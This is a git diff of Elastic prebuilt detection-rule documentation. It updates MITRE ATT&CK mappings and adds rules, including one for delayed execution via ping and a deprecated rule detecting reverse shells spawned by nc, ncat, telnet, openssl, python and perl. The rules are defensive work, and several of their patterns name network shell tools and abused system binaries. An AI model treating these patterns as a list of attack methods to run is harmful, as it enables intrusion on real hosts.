a/docs/detections/prebuilt-rules/rule-details/conhost-spawned-by-suspicious-parent-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/conhost-spawned-by-suspicious-parent-process.asciidoc @@ -32,11 +32,13 @@ Detects when the Console Window Host (conhost.exe) process is spawned by a suspi * OS: Windows * Use Case: Threat Detection * Tactic: Execution +* Tactic: Defense Evasion +* Tactic: Privilege Escalation * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -125,3 +127,19 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Command and Scripting Interpreter ** ID: T1059 ** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ diff --git a/docs/detections/prebuilt-rules/rule-details/connection-to-commonly-abused-web-services.asciidoc b/docs/detections/prebuilt-rules/rule-details/connection-to-commonly-abused-web-services.asciidoc index bf4ecf6618..47a5cd387a 100644 --- a/docs/detections/prebuilt-rules/rule-details/connection-to-commonly-abused-web-services.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/connection-to-commonly-abused-web-services.asciidoc @@ -30,7 +30,7 @@ Adversaries may implement command and control (C2) communications that use commo * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -181,6 +181,14 @@ network where host.os.type == "windows" and network.protocol == "dns" and ** Name: Web Service ** ID: T1102 ** Reference URL: https://attack.mitre.org/techniques/T1102/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ * Tactic: ** Name: Exfiltration ** ID: TA0010 diff --git a/docs/detections/prebuilt-rules/rule-details/connection-to-external-network-via-telnet.asciidoc b/docs/detections/prebuilt-rules/rule-details/connection-to-external-network-via-telnet.asciidoc index b5562ecc4a..eaa8c08116 100644 --- a/docs/detections/prebuilt-rules/rule-details/connection-to-external-network-via-telnet.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/connection-to-external-network-via-telnet.asciidoc @@ -32,7 +32,7 @@ Telnet provides a command line interface for communication with a remote device * Tactic: Lateral Movement * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/connection-to-internal-network-via-telnet.asciidoc b/docs/detections/prebuilt-rules/rule-details/connection-to-internal-network-via-telnet.asciidoc index 984db8a383..813d55cd14 100644 --- a/docs/detections/prebuilt-rules/rule-details/connection-to-internal-network-via-telnet.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/connection-to-internal-network-via-telnet.asciidoc @@ -32,7 +32,7 @@ Telnet provides a command line interface for communication with a remote device * Tactic: Lateral Movement * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/creation-of-hidden-files-and-directories-via-commandline.asciidoc b/docs/detections/prebuilt-rules/rule-details/creation-of-hidden-files-and-directories-via-commandline.asciidoc index 6ae044e4b6..a6cd276d64 100644 --- a/docs/detections/prebuilt-rules/rule-details/creation-of-hidden-files-and-directories-via-commandline.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/creation-of-hidden-files-and-directories-via-commandline.asciidoc @@ -30,7 +30,7 @@ Users can mark specific files as hidden simply by putting a "." as the first cha * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -39,47 +39,6 @@ Users can mark specific files as hidden simply by putting a "." as the first cha *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -### Elastic Defend Integration Setup -Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows -the Elastic Agent to monitor events on your host and send data to the Elastic Security app. - -#### Prerequisite Requirements: -- Fleet is required for Elastic Defend. -- To configure Fleet Server refer to the {security-guide}/fleet/current/fleet-server.html[documentation]. - -#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Elastic Defend and select the integration to see more details about it. -- Click Add Elastic Defend. -- Configure the integration name and optionally add a description. -- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads. -- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. {security-guide}/security/current/configure-endpoint-integration-policy.html[Helper guide]. -- We suggest to select "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" -- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead. -For more details on Elastic Agent configuration settings, refer to the {security-guide}/fleet/8.10/agent-policy.html[helper guide]. -- Click Save and Continue. -- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts. -For more details on Elastic Defend refer to the {security-guide}/security/current/install-endpoint.html[helper guide]. - -### Auditbeat Setup -Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. - -#### The following steps should be executed in order to add the Auditbeat for Linux System: -- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. -- To install the APT and YUM repositories follow the setup instructions in this {security-guide}/beats/auditbeat/current/setup-repositories.html[helper guide]. -- To run Auditbeat on Docker follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-docker.html[helper guide]. -- To run Auditbeat on Kubernetes follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. -- For complete Setup and Run Auditbeat information refer to the {security-guide}/beats/auditbeat/current/setting-up-and-running.html[helper guide]. - -#### Custom Ingest Pipeline -For versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the {security-guide}/fleet/current/data-streams-pipeline-tutorial.html[guide]. ----------------------------------- - ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/creation-of-hidden-shared-object-file.asciidoc b/docs/detections/prebuilt-rules/rule-details/creation-of-hidden-shared-object-file.asciidoc index afaadcecb9..1c5c4634a8 100644 --- a/docs/detections/prebuilt-rules/rule-details/creation-of-hidden-shared-object-file.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/creation-of-hidden-shared-object-file.asciidoc @@ -32,7 +32,7 @@ Identifies the creation of a hidden shared object (.so) file. Users can mark spe * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -41,47 +41,6 @@ Identifies the creation of a hidden shared object (.so) file. Users can mark spe *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -### Elastic Defend Integration Setup -Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows -the Elastic Agent to monitor events on your host and send data to the Elastic Security app. - -#### Prerequisite Requirements: -- Fleet is required for Elastic Defend. -- To configure Fleet Server refer to the {security-guide}/fleet/current/fleet-server.html[documentation]. - -#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Elastic Defend and select the integration to see more details about it. -- Click Add Elastic Defend. -- Configure the integration name and optionally add a description. -- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads. -- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. {security-guide}/security/current/configure-endpoint-integration-policy.html[Helper guide]. -- We suggest to select "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" -- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead. -For more details on Elastic Agent configuration settings, refer to the {security-guide}/fleet/8.10/agent-policy.html[helper guide]. -- Click Save and Continue. -- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts. -For more details on Elastic Defend refer to the {security-guide}/security/current/install-endpoint.html[helper guide]. - -### Auditbeat Setup -Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. - -#### The following steps should be executed in order to add the Auditbeat for Linux System: -- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. -- To install the APT and YUM repositories follow the setup instructions in this {security-guide}/beats/auditbeat/current/setup-repositories.html[helper guide]. -- To run Auditbeat on Docker follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-docker.html[helper guide]. -- To run Auditbeat on Kubernetes follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. -- For complete Setup and Run Auditbeat information refer to the {security-guide}/beats/auditbeat/current/setting-up-and-running.html[helper guide]. - -#### Custom Ingest Pipeline -For versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the {security-guide}/fleet/current/data-streams-pipeline-tutorial.html[guide]. ----------------------------------- - ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/creation-or-modification-of-a-new-gpo-scheduled-task-or-service.asciidoc b/docs/detections/prebuilt-rules/rule-details/creation-or-modification-of-a-new-gpo-scheduled-task-or-service.asciidoc index 9029249e8c..4829fba4e6 100644 --- a/docs/detections/prebuilt-rules/rule-details/creation-or-modification-of-a-new-gpo-scheduled-task-or-service.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/creation-or-modification-of-a-new-gpo-scheduled-task-or-service.asciidoc @@ -29,11 +29,12 @@ Detects the creation or modification of a new Group Policy based scheduled task * Domain: Endpoint * OS: Windows * Use Case: Threat Detection +* Tactic: Privilege Escalation * Tactic: Persistence * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -64,6 +65,18 @@ file where host.os.type == "windows" and event.type != "deletion" and *Framework*: MITRE ATT&CK^TM^ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Domain Policy Modification +** ID: T1484 +** Reference URL: https://attack.mitre.org/techniques/T1484/ +* Sub-technique: +** Name: Group Policy Modification +** ID: T1484.001 +** Reference URL: https://attack.mitre.org/techniques/T1484/001/ * Tactic: ** Name: Persistence ** ID: TA0003 diff --git a/docs/detections/prebuilt-rules/rule-details/cron-job-created-or-changed-by-previously-unknown-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/cron-job-created-or-changed-by-previously-unknown-process.asciidoc index 65bd1f30f2..6518c31475 100644 --- a/docs/detections/prebuilt-rules/rule-details/cron-job-created-or-changed-by-previously-unknown-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/cron-job-created-or-changed-by-previously-unknown-process.asciidoc @@ -35,7 +35,7 @@ Linux cron jobs are scheduled tasks that can be leveraged by malicious actors fo * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -53,7 +53,7 @@ host.os.type : "linux" and event.action : ("change" or "file_modify_event" or "c file.path : (/etc/cron.allow or /etc/cron.deny or /etc/cron.d/* or /etc/cron.hourly/* or /etc/cron.daily/* or /etc/cron.weekly/* or /etc/cron.monthly/* or /etc/crontab or /usr/sbin/cron or /usr/sbin/anacron) and not (process.name : ("dpkg" or "dockerd" or "rpm" or "snapd" or "yum" or "exe" or "dnf" or "5") or -file.extension : ("swp" or "swx")) +file.extension : ("swp" or "swpx")) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/delayed-execution-via-ping.asciidoc b/docs/detections/prebuilt-rules/rule-details/delayed-execution-via-ping.asciidoc new file mode 100644 index 0000000000..9b4a0b932c --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/delayed-execution-via-ping.asciidoc @@ -0,0 +1,149 @@ +[[delayed-execution-via-ping]] +=== Delayed Execution via Ping + +Identifies the execution of commonly abused Windows utilities via a delayed Ping execution. This behavior is often observed during malware installation and is consistent with an attacker attempting to evade detection. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Rule Type: BBR + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.parent.entity_id with maxspan=1m + [process where host.os.type == "windows" and event.action == "start" and process.name : "ping.exe" and + process.args : "-n" and process.parent.name : "cmd.exe" and not user.id : "S-1-5-18"] + [process where host.os.type == "windows" and event.action == "start" and + process.parent.name : "cmd.exe" and + ( + process.name : ( + "rundll32.exe", "powershell.exe", + "mshta.exe", "msbuild.exe", + "certutil.exe", "regsvr32.exe", + "powershell.exe", "cscript.exe", + "wscript.exe", "wmic.exe", + "installutil.exe", "msxsl.exe", + "Microsoft.Workflow.Compiler.exe", + "ieexec.exe", "iexpress.exe", + "RegAsm.exe", "installutil.exe", + "RegSvcs.exe", "RegAsm.exe" + ) or + (process.executable : "?:\\Users\\*\\AppData\\*.exe" and not process.code_signature.trusted == true) + ) and + + not process.args : ("?:\\Program Files\\*", "?:\\Program Files (x86)\\*") and + not (process.name : ("openssl.exe", "httpcfg.exe", "certutil.exe") and process.parent.command_line : "*ScreenConnectConfigurator.cmd*") and + not (process.pe.original_file_name : "DPInst.exe" and process.command_line : "driver\\DPInst_x64 /f ") and + not (process.name : "powershell.exe" and process.args : "Write-Host ======*") and + not (process.name : "wscript.exe" and process.args : "launchquiet_args.vbs" and process.parent.args : "?:\\Windows\\TempInst\\7z*") and + not (process.name : "regsvr32.exe" and process.args : ("?:\\windows\\syswow64\\msxml?.dll", "msxml?.dll", "?:\\Windows\\SysWOW64\\mschrt20.ocx")) and + not (process.name : "wscript.exe" and + process.working_directory : + ("?:\\Windows\\TempInst\\*", + "?:\\Users\\*\\AppData\\Local\\Temp\\BackupBootstrapper\\Logs\\", + "?:\\Users\\*\\AppData\\Local\\Temp\\QBTools\\")) + ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Virtualization/Sandbox Evasion +** ID: T1497 +** Reference URL: https://attack.mitre.org/techniques/T1497/ +* Sub-technique: +** Name: Time Based Evasion +** ID: T1497.003 +** Reference URL: https://attack.mitre.org/techniques/T1497/003/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: CMSTP +** ID: T1218.003 +** Reference URL: https://attack.mitre.org/techniques/T1218/003/ +* Sub-technique: +** Name: InstallUtil +** ID: T1218.004 +** Reference URL: https://attack.mitre.org/techniques/T1218/004/ +* Sub-technique: +** Name: Mshta +** ID: T1218.005 +** Reference URL: https://attack.mitre.org/techniques/T1218/005/ +* Sub-technique: +** Name: Regsvcs/Regasm +** ID: T1218.009 +** Reference URL: https://attack.mitre.org/techniques/T1218/009/ +* Sub-technique: +** Name: Regsvr32 +** ID: T1218.010 +** Reference URL: https://attack.mitre.org/techniques/T1218/010/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ +* Technique: +** Name: System Script Proxy Execution +** ID: T1216 +** Reference URL: https://attack.mitre.org/techniques/T1216/ +* Technique: +** Name: XSL Script Processing +** ID: T1220 +** Reference URL: https://attack.mitre.org/techniques/T1220/ diff --git a/docs/detections/prebuilt-rules/rule-details/deleting-backup-catalogs-with-wbadmin.asciidoc b/docs/detections/prebuilt-rules/rule-details/deleting-backup-catalogs-with-wbadmin.asciidoc index cca310b2a4..b8317543e2 100644 --- a/docs/detections/prebuilt-rules/rule-details/deleting-backup-catalogs-with-wbadmin.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/deleting-backup-catalogs-with-wbadmin.asciidoc @@ -34,7 +34,7 @@ Identifies use of the wbadmin.exe to delete the backup catalog. Ransomware and o * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -109,3 +109,7 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Inhibit System Recovery ** ID: T1490 ** Reference URL: https://attack.mitre.org/techniques/T1490/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ diff --git a/docs/detections/prebuilt-rules/rule-details/deprecated-potential-reverse-shell-via-suspicious-parent-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/deprecated-potential-reverse-shell-via-suspicious-parent-process.asciidoc new file mode 100644 index 0000000000..cf3dbfc07b --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/deprecated-potential-reverse-shell-via-suspicious-parent-process.asciidoc @@ -0,0 +1,95 @@ +[[deprecated-potential-reverse-shell-via-suspicious-parent-process]] +=== Deprecated - Potential Reverse Shell via Suspicious Parent Process + +This detection rule detects the creation of a shell through a suspicious parent child relationship. Any reverse shells spawned by the specified utilities that use a forked process to initialize the connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +This rule was deprecated due to its addition to the umbrella `Potential Reverse Shell via Suspicious Child Process` (76e4d92b-61c1-4a95-ab61-5fd94179a1ee) rule. +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.parent.entity_id with maxspan=1s +[ process where host.os.type == "linux" and event.type == "start" and event.action == "fork" and ( + (process.name : "python*" and process.args == "-c" and not process.args == "/usr/bin/supervisord") or + (process.name : "php*" and process.args == "-r") or + (process.name : "perl" and process.args == "-e") or + (process.name : "ruby" and process.args in ("-e", "-rsocket")) or + (process.name : "lua*" and process.args == "-e") or + (process.name : "openssl" and process.args : "-connect") or + (process.name : ("nc", "ncat", "netcat") and process.args_count >= 3 and not process.args == "-z") or + (process.name : "telnet" and process.args_count >= 3) or + (process.name : "awk")) and + process.parent.name : ("python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk") ] +[ network where host.os.type == "linux" and event.type == "start" and event.action in ("connection_attempted", "connection_accepted") and + process.name : ("python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk") and + destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1" ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ diff --git a/docs/detections/prebuilt-rules/rule-details/disable-windows-event-and-security-logs-using-built-in-tools.asciidoc b/docs/detections/prebuilt-rules/rule-details/disable-windows-event-and-security-logs-using-built-in-tools.asciidoc index 30ed45dc45..fff1490ec7 100644 --- a/docs/detections/prebuilt-rules/rule-details/disable-windows-event-and-security-logs-using-built-in-tools.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/disable-windows-event-and-security-logs-using-built-in-tools.asciidoc @@ -37,7 +37,7 @@ Identifies attempts to disable EventLog via the logman Windows utility, PowerShe * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -123,6 +123,10 @@ process where host.os.type == "windows" and event.type == "start" and ** ID: T1562 ** Reference URL: https://attack.mitre.org/techniques/T1562/ * Sub-technique: +** Name: Disable Windows Event Logging +** ID: T1562.002 +** Reference URL: https://attack.mitre.org/techniques/T1562/002/ +* Sub-technique: ** Name: Indicator Blocking ** ID: T1562.006 ** Reference URL: https://attack.mitre.org/techniques/T1562/006/ diff --git a/docs/detections/prebuilt-rules/rule-details/disabling-user-account-control-via-registry-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/disabling-user-account-control-via-registry-modification.asciidoc index 1cb9d9cc95..73d11d4ad3 100644 --- a/docs/detections/prebuilt-rules/rule-details/disabling-user-account-control-via-registry-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/disabling-user-account-control-via-registry-modification.asciidoc @@ -38,7 +38,7 @@ User Account Control (UAC) can help mitigate the impact of malware on Windows ho * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -145,3 +145,15 @@ registry where host.os.type == "windows" and event.type == "change" and ** Name: Bypass User Account Control ** ID: T1548.002 ** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/disabling-windows-defender-security-settings-via-powershell.asciidoc b/docs/detections/prebuilt-rules/rule-details/disabling-windows-defender-security-settings-via-powershell.asciidoc index 43c8c3b666..036a84243b 100644 --- a/docs/detections/prebuilt-rules/rule-details/disabling-windows-defender-security-settings-via-powershell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/disabling-windows-defender-security-settings-via-powershell.asciidoc @@ -32,11 +32,12 @@ Identifies use of the Set-MpPreference PowerShell command to disable or weaken c * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -113,3 +114,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Disable or Modify Tools ** ID: T1562.001 ** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/dns-over-https-enabled-via-registry.asciidoc b/docs/detections/prebuilt-rules/rule-details/dns-over-https-enabled-via-registry.asciidoc index d9ff7e58c4..6c60982d0d 100644 --- a/docs/detections/prebuilt-rules/rule-details/dns-over-https-enabled-via-registry.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/dns-over-https-enabled-via-registry.asciidoc @@ -36,7 +36,7 @@ Identifies when a user enables DNS-over-HTTPS. This can be used to hide internet * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -78,3 +78,7 @@ registry where host.os.type == "windows" and event.type in ("creation", "change" ** Name: Impair Defenses ** ID: T1562 ** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/dynamic-linker-copy.asciidoc b/docs/detections/prebuilt-rules/rule-details/dynamic-linker-copy.asciidoc index 8e0c3e775b..ef500e3ad2 100644 --- a/docs/detections/prebuilt-rules/rule-details/dynamic-linker-copy.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/dynamic-linker-copy.asciidoc @@ -32,7 +32,7 @@ Detects the copying of the Linux dynamic loader binary and subsequent file creat * Threat: Orbit * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/encrypting-files-with-winrar-or-7z.asciidoc b/docs/detections/prebuilt-rules/rule-details/encrypting-files-with-winrar-or-7z.asciidoc index 8ac0fe944d..fce6a6dd06 100644 --- a/docs/detections/prebuilt-rules/rule-details/encrypting-files-with-winrar-or-7z.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/encrypting-files-with-winrar-or-7z.asciidoc @@ -36,7 +36,7 @@ Identifies use of WinRar or 7z to create an encrypted files. Adversaries will of * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -118,3 +118,7 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Archive via Utility ** ID: T1560.001 ** Reference URL: https://attack.mitre.org/techniques/T1560/001/ +* Technique: +** Name: Data from Local System +** ID: T1005 +** Reference URL: https://attack.mitre.org/techniques/T1005/ diff --git a/docs/detections/prebuilt-rules/rule-details/enumeration-of-kernel-modules-via-proc.asciidoc b/docs/detections/prebuilt-rules/rule-details/enumeration-of-kernel-modules-via-proc.asciidoc index b0a906fc74..269673aaa9 100644 --- a/docs/detections/prebuilt-rules/rule-details/enumeration-of-kernel-modules-via-proc.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/enumeration-of-kernel-modules-via-proc.asciidoc @@ -3,7 +3,7 @@ Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This identifies attempts to enumerate information about a kernel module using the /proc/modules filesystem. This filesystem is used by utilities such as lsmod and kmod to list the available kernel modules. -*Rule type*: eql +*Rule type*: new_terms *Rule indices*: @@ -24,13 +24,12 @@ Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unlo *Tags*: -* Domain: Endpoint * OS: Linux * Use Case: Threat Detection * Tactic: Discovery * Rule Type: BBR -*Version*: 3 +*Version*: 103 *Rule authors*: @@ -66,11 +65,7 @@ Add the newly installed `auditd manager` to an agent policy, and deploy the agen [source, js] ---------------------------------- -file where host.os.type == "linux" and event.action == "opened-file" and file.path == "/proc/modules" and not -( - process.name in ("auditbeat", "kmod", "modprobe", "lsmod", "insmod", "modinfo", "rmmod", "SchedulerRunner", "grep") or - process.parent.pid == 1 or process.title : "*grep*" -) +host.os.type:linux and event.category:file and event.action:"opened-file" and file.path:"/proc/modules" ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/enumeration-of-kernel-modules.asciidoc b/docs/detections/prebuilt-rules/rule-details/enumeration-of-kernel-modules.asciidoc index 663f59aaf7..fc083f0da6 100644 --- a/docs/detections/prebuilt-rules/rule-details/enumeration-of-kernel-modules.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/enumeration-of-kernel-modules.asciidoc @@ -29,7 +29,7 @@ Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unlo * Tactic: Discovery * Data Source: Elastic Defend -*Version*: 205 +*Version*: 206 *Rule authors*: @@ -47,8 +47,7 @@ event.category:process and host.os.type:linux and event.type:start and ( (process.name:(lsmod or modinfo)) or (process.name:kmod and process.args:list) or (process.name:depmod and process.args:(--all or -a)) -) and process.parent.name:(sudo or bash or dash or ash or sh or tcsh or csh or zsh or ksh or fish) and -not process.parent.user.id:0 +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/esxi-discovery-via-find.asciidoc b/docs/detections/prebuilt-rules/rule-details/esxi-discovery-via-find.asciidoc index a895faf7d0..200f8b3755 100644 --- a/docs/detections/prebuilt-rules/rule-details/esxi-discovery-via-find.asciidoc +++ 